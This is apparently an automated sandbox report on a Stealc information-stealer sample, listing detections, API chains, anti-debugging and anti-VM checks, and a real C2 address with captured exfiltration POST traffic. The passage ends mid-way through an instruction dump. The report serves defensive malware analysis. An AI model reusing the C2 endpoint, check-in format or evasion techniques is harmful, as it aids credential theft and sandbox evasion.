
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532863
MD5: 02fe6d790607494b5b820f41cdad2e17
SHA1: 1e526eb65c6c1677ced067310193991805faeea1
SHA256: 37008bff1b7f3719aee4bae2d90ba57c05618731bece25285e44160137e9c1d3
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6312 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 02FE6D790607494B5B820F41CDAD2E17)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Source | Rule | Description | Author
00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1730488499.0000000005480000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6312 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6312 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Source | Rule | Description | Author
0.2.file.exe.9a0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-14T03:07:06.871801+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.9a0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.phpH | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpT | Virustotal: Detection: 16%
Source: file.exe | Virustotal: Detection: 53%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIE
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 38 43 36 31 37 38 32 32 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 2d 2d 0d 0a
  Data Ascii: ------HIDBFCBGDBKKECBFCGIE Content-Disposition: form-data; name="hwid" B88C617822D72284582127 ------HIDBFCBGDBKKECBFCGIE Content-Disposition: form-data; name="build" doma ------HIDBFCBGDBKKECBFCGIE--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A6280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIE
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 38 43 36 31 37 38 32 32 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 2d 2d 0d 0a
  Data Ascii: ------HIDBFCBGDBKKECBFCGIE Content-Disposition: form-data; name="hwid" B88C617822D72284582127 ------HIDBFCBGDBKKECBFCGIE Content-Disposition: form-data; name="build" doma ------HIDBFCBGDBKKECBFCGIE--
Source: file.exe, 00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1771889897.0000000001628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1771889897.0000000001615000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1771889897.0000000001653000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1771889897.0000000001615000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpH
Source: file.exe, 00000000.00000002.1771889897.0000000001615000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpT

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC58B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC084B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D629A4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D67A93
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C6AA1B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6CBCF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6D46F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6145D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D5F442
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD8C55
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D66C0E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0FF9A
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 009A45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: njbeecvb ZLIB complexity 0.9945937647964015
Source: file.exe, 00000000.00000003.1730488499.0000000005480000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\WHM4L5LB.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies7;
Source: file.exe | Virustotal: Detection: 53%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1778176 > 1048576
Source: file.exe | Static PE information: Raw size of njbeecvb is bigger than: 0x100000 < 0x18c000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.9a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;njbeecvb:EW;zajrgpdb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;njbeecvb:EW;zajrgpdb:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1b43e9 should be: 0x1be589
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: njbeecvb
Source: file.exe | Static PE information: section name: zajrgpdb
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E0E8EF push ebp; mov dword ptr [esp], eax | 0_2_00E0E91E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E0E8EF push ebp; mov dword ptr [esp], 13E14D61h | 0_2_00E0E950
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DC40C6 push 58EDF0C2h; mov dword ptr [esp], edx | 0_2_00DC40DB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF08E7 push 031709D1h; mov dword ptr [esp], ecx | 0_2_00DF0915
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E3D8B4 push ebp; mov dword ptr [esp], esi | 0_2_00E3D8D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE4080 push edi; mov dword ptr [esp], ecx | 0_2_00DE413A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC58B5 push eax; mov dword ptr [esp], esi | 0_2_00CC5A0A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC58B5 push 5213763Eh; mov dword ptr [esp], edx | 0_2_00CC5A33
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DCC0A2 push eax; mov dword ptr [esp], ebp | 0_2_00DCC0C5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100E186 push esi; mov dword ptr [esp], 769BF136h | 0_2_0100E187
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100E186 push 5DF75AC5h; mov dword ptr [esp], ebx | 0_2_0100E1C4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100E186 push ebx; mov dword ptr [esp], 50033243h | 0_2_0100E1DE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100E186 push edx; mov dword ptr [esp], ecx | 0_2_0100E22B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC084B push 530DF87Ah; mov dword ptr [esp], esi | 0_2_00CC0886
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF5847 push ecx; mov dword ptr [esp], 7B965AF1h | 0_2_00DF586E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push eax; mov dword ptr [esp], esi | 0_2_00D6B1B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push ecx; mov dword ptr [esp], 71FE0091h | 0_2_00D6B212
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push eax; mov dword ptr [esp], edi | 0_2_00D6B224
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push esi; mov dword ptr [esp], eax | 0_2_00D6B230
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push 2F689483h; mov dword ptr [esp], esi | 0_2_00D6B24A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push edi; mov dword ptr [esp], edx | 0_2_00D6B27D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push eax; mov dword ptr [esp], 53F3BBBBh | 0_2_00D6B281
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push 6385A7DBh; mov dword ptr [esp], edx | 0_2_00D6B2CA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push esi; mov dword ptr [esp], eax | 0_2_00D6B2D5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push esi; mov dword ptr [esp], ebx | 0_2_00D6B31C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push 31218F90h; mov dword ptr [esp], edi | 0_2_00D6B35F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push esi; mov dword ptr [esp], ecx | 0_2_00D6B394
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push 09E4C154h; mov dword ptr [esp], ebp | 0_2_00D6B39C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push ebx; mov dword ptr [esp], esi | 0_2_00D6B4B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push eax; mov dword ptr [esp], edx | 0_2_00D6B4F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6B073 push 02EE8C86h; mov dword ptr [esp], esi | 0_2_00D6B64C
Source: file.exe | Static PE information: section name: njbeecvb entropy: 7.953282127630772

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13526
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D72391 second address: D723A4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F70ECA9ACh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D723A4 second address: D723B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0F7085C59Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D723B8 second address: D723C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7130D second address: D71313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D71313 second address: D71317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D71317 second address: D71327 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007F0F7085C596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D71327 second address: D71334 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnp 00007F0F70ECA9A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D71611 second address: D71617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D71617 second address: D7161B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7161B second address: D71625 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F7085C596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D717B3 second address: D717BD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0F70ECA9AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D71A8D second address: D71AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F0F7085C5A0h 0x0000000e jne 00007F0F7085C596h 0x00000014 popad 0x00000015 je 00007F0F7085C5AEh 0x0000001b jmp 00007F0F7085C5A2h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D71AC7 second address: D71ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D71C11 second address: D71C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D74AE2 second address: D74B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 xor dword ptr [esp], 7F8F097Bh 0x0000000c mov dword ptr [ebp+122D27F5h], ebx 0x00000012 push 00000003h 0x00000014 jmp 00007F0F70ECA9AEh 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F0F70ECA9A8h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D27F5h], ebx 0x0000003b mov edx, dword ptr [ebp+122D2E13h] 0x00000041 push 00000003h 0x00000043 call 00007F0F70ECA9A9h 0x00000048 pushad 0x00000049 pushad 0x0000004a js 00007F0F70ECA9A6h 0x00000050 jmp 00007F0F70ECA9AAh 0x00000055 popad 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 jmp 00007F0F70ECA9AFh 0x0000005e popad 0x0000005f popad 0x00000060 push eax 0x00000061 pushad 0x00000062 jmp 00007F0F70ECA9B0h 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 